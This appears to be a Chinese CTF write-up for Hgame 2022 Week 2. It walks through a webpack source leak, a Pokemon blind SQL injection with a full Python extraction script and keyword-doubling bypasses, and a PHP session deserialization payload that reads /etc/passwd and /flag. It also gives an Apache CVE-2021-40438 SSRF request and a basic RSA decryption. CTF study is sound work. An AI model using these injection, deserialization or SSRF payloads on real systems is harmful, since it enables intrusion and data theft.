Hgame2022-Week2

这周主要做web了,后来做了一个misc,结果做完了也上新题目了,比较尬住了


Week2

WEB

webpack-engine

根据题目名称提示,webpack,在网上找了一下常见会出现的漏洞

image_1fquh3cm2u7c12u01be3q59196q9.png-114.6kB

发现大多数漏洞提醒都为接口泄露,本意是想从加密的js中解密获取接口信息,后来看漏洞详情发现直接能在sources里面查看源码

image_1fquh59rk1joq7ui15t329p1dhlm.png-98.5kB

发现加密的flag,base直接解密即可获取flag

Pokemon

点进页面根据提示?id=1

image_1fquh8idh1aklikh1nprq2b13t313.png-42.7kB

猜测应该是考察sql注入,后来测试了一下id参数没有反应,发现报错页面存在问题

image_1fquhaa8l5m4scl14i91s4sudk1g.png-67.9kB

存在code参数,修改code值发现报错信息

image_1fquhben113eoc7ega9lq1172h1t.png-60.4kB

注入点应该为code处,尝试进行异或发现构造成功

image_1fquhcn5i1hhj16oa1lq0rklv9u2a.png-72.9kB

测试关键字符发现题目对字符进行了替换为空操作,可以通过双写进行绕过,同时题目对> < =等特殊字符进行了实体化编码

image_1fquhj3241bo515vgntk10951dhp2n.png-56.1kB

我们使用strcmp替换比较符号,同时构造盲注payload

image_1fquhldn21dt1iuju9f8eqar34.png-69.9kB

404^(strcmp((selselectect/*/**/*/ascii(substr(database(),1,1))),1)) 

根据页面返回数据进行判断

image_1fquhnil41nfl1cl1ilbjoc16h13h.png-70.5kB

当页面返回数据为404时,payload判断成功,以此为依据进行脚本编写

import requests
import sys
url="http://121.43.141.153:60056/error.php?code="
#database:pokemon
#table:errors,fllllllllaaaaaag
#columns
database=''
for j in range(1,50):
    for i in range(1,150):
        payload1="404^(strcmp((selselectect/*/**/*/ascii(substr(database(),{},1))),{}))".format((j),(i))
        payload2="404^(strcmp((selselectect/*/**/*/ascii(substr((seselectlect(group_concat(table_name))frfromom(infoorrmation_schema.tables)whwhereere(table_schema)in(database())),{},1))),{}))".format((j),(i))
        payload3="404^(strcmp((selselectect/*/**/*/ascii(substr((seselectlect(group_concat(column_name))frfromom(infoorrmation_schema.columns)whwhereere(table_schema)in(database())),{},1))),{}))".format((j),(i))
        payload4="404^(strcmp((seselectlect/*/**/*/ascii(substr((seselectlect(group_concat(flag))frfromom(fllllllllaaaaaag)),{},1))),{}))".format((j),(i))
        response = requests.get(url+payload4).text
        if "Pokemon" in response:
            misc=(chr(int(i)))
            database+=misc
            print(database)
            j += 1
            break       

查库:

image_1fqui3rde83c19urkbj17snedo3u.png-96.6kB

查flag:

image_1fquiad0h15hd1vmmsth1a4n8944b.png-443.4kB

一本单词书

image_1fquiclt9k8icin10df1pro1bta4o.png-31.5kB

根据提示发现存在源码泄露,下载解压进行查看

image_1fquihhjn1pd41tmt1kh1f1ou2b55.png-32.3kB

首先查看最有可能存在命令执行的文件ping.php

image_1fquiitjm4h97s3oa91j08f515i.png-8.6kB

可以直接排除

再次查看admin_check.php

image_1fquika3n4v025r1puh2l27b35v.png-24.9kB

文件主要是对登陆状态进行check,跟着节奏回到login.php,截取部分核心代码

image_1fquinlq41cihhe81n7v1gm311836c.png-137.9kB

这段代码主要是对登陆进行校验,根据代码可以总结出:

username=adm1n
password=1080

但是题目对我们输入的password进行了校验,不允许数据的值为纯数字,所以我们要对is_numeric()进行绕过

百度了一下发现该函数可以通过十六进制绕过或者%00进行绕过,这里使用%00进行绕过

image_1fquj09gmeb1ll8evo1smk19g46p.png-115.1kB

username=adm1n&password=1080%00a

302跳转证明登陆成功,此时返回页面发现chrome浏览器会出现安全提醒导致我们无法继续进行下一步

image_1fquj2arcmc81slo1ugudgo4p076.png-71.3kB

此时可以访问该页面

chrome://net-internals/#hsts

image_1fquj4ktk1q7i1atk11er1mu4sbp7j.png-39.1kB

在这里剔除掉题目网站的域名,再次访问即可成功访问页面

image_1fquj5rac1nj8vtp1d5dmf71v7m80.png-18.5kB

登陆成功后访问到该页面

image_1fquj7tt71vnqi5mi2q1hlc1g1s8d.png-20.9kB

根据源码进行分析,分析index.php

image_1fquj9dgf6t81tcms3r6k1l258q.png-71kB

页面的数据处理在get.php和save.php

save.php

<?php
session_start();
include 'admin_check.php';

function encode($data): string {
    $result = '';
    foreach ($data as $k => $v) {
        $result .= $k . '|' . serialize($v);
    }

    return $result;
}

function saveSessionData() {
    $filename = "/tmp/".$_SESSION['unique_key'].'.session';
    $data = json_decode(file_get_contents("php://input"));
    $str = encode($data);
    file_put_contents($filename, $str, FILE_APPEND);
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    saveSessionData();
} else {
    echo 'method not allowed';
}

主要分析两个function,encode函数比较直观,是对我们的数据进行序列化存储,saveSessionData主要是获取数据同时调用encode函数将数据存储到指定位置,该文件是由登陆时产生的key进行命名的,调试一下经过encode传输的数据

image_1fqumkb4fqov15581rd7dol1aj897.png-40.2kB

可以看到数据将我们value进行序列化存储了,接着分析一下get.php

get.php

<?php
session_start();
include 'admin_check.php';
include 'evil.php';

// flag is in /flag

function decode(string $data): Array {
    $result = [];
    $offset = 0;
    $length = \strlen($data);
    while ($offset < $length) {
        if (!strstr(substr($data, $offset), '|')) {
            return [];
        }
        $pos = strpos($data, '|', $offset);
        $num = $pos - $offset;
        $varname = substr($data, $offset, $num);
        $offset += $num + 1;
        $dataItem = unserialize(substr($data, $offset));

        $result[$varname] = $dataItem;
        $offset += \strlen(serialize($dataItem));
    }
    return $result;
}

function loadSessionData(): Array {
    $filename = '/tmp/'.$_SESSION['unique_key'].'.session';
    if (file_exists($filename)) {
        $str = file_get_contents($filename);
        return decode($str);
    } else {
        file_put_contents($filename, '');
        return [];
    }
}

echo json_encode(loadSessionData());

首先文件告诉了我们flag位置,其次分析两个function,decode函数主要是对传入的数据进行反序列化输出,与刚才save.php中的encode函数互相对应,可以看到encode函数是通过“|”分割key和value的,而decode函数则是通过“|”来进行数据判断,对“|”后来的数据进行反序列化操作。这里就存在一个问题,我们可以通过传输数据中添加“|”以此来利用docode函数的反序列化进行执行,同时查看evil.php发现了获取flag的点

image_1fqumqrapues1ct4afu1c4fibd9k.png-54.6kB

存在file_get_contents,至此我们可以利用evil.php生成payload,再通过get.php进行触发,构造payload,尝试读取文件

<?php

class Evil {
    public $file="/etc/passwd";
    public $flag="flag{}";

}

$data=new Evil();
echo serialize($data);
//O:4:"Evil":2:{s:4:"file";s:11:"/etc/passwd";s:4:"flag";s:6:"flag{}";}

在传输数据时要注意,如果payload写在value处,会在save.php中被序列化掉,所以要将payload写入key处

{"1|O:4:\"Evil\":2:{s:4:\"file\";s:11:\"/etc/passwd\";s:4:\"flag\";s:6:\"flag{}\";}":"123"}

image_1fqun9j4q1t4118ab4ru44lgla1.png-72kB

访问get.php

image_1fqunal171l081evo5aj3r19scae.png-105.5kB

成功获取到数据,此时修改读取文件为/flag即可获取到数据

{"1|O:4:\"Evil\":2:{s:4:\"file\";s:5:\"/flag\";s:4:\"flag\";s:6:\"flag{}\";}":"123"}

image_1fqunehqja5pigb1nfd115111laar.png-70.6kB

Apache!

image_1fqunhnip138o1f5a1cus1qms12jgb8.png-26.5kB

根据题目提示,flag在内网同时正常服务已经down掉,此时能够访问内网的就需要借助中间件漏洞或者框架漏洞,这里题目很明显给了提示,我们需要借助apache的漏洞进行执行,所以思路就很明显了

apache漏洞+需要攻击内网,能访问内网就最先想到SSRF,所以题目应该是考察CVE-2021-40438

image_1fqunq5771rgg1vte1u5fgfm9kdbl.png-87.1kB

根据题目提示

image_1fqunsbh11db23lo1l7m41e1giqc2.png-22.3kB

访问无法成功,这时查看源码发现www.zip,下载进行查看

image_1fqup0ul5bjfp2i1mjf15tosmcf.png-18.4kB

文件为系统的配置信息,读取一下docker-compose.yml为靶机的docker启动文件

查看httpd.conf

image_1fqupaeur1sff12o5n5lug41pd6dm.png-19.5kB

该模块功能为转发请求至Tomcat

查看一下default.conf

image_1fqup4m3u1lrr1fnq1r91p966shcs.png-31.8kB

发现获取flag的页面,同时查看到proxy_pass

查看httpd-vhosts.conf,发现信息

image_1fqup8gad5e1oj6cegoji11lfd9.png-66.2kB

再次构造payload,我们需要通过proxy进行访问

/proxy?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://internal.host/flag

image_1fqupk8gnb1vifs1721ubm1f3oeg.png-75.8kB

成功获取到flag

Crypto

RSA Attack

基础RSA

分解获取p、q

image_1fquq583rh3p137l1q491jgi1vh2et.png-33.8kB

构造脚本获取flag

from Crypto.Util.number import *

e = 65537
n = 700612512827159827368074182577656505408114629807
c = 122622425510870177715177368049049966519567512708
p = 715800347513314032483037
q = 978782023871716954857211
d = inverse(e,(p-1)*(q-1))
m = pow(c,d,n)
print(long_to_bytes(m))

发表评论

邮箱地址不会被公开。 必填项已用*标注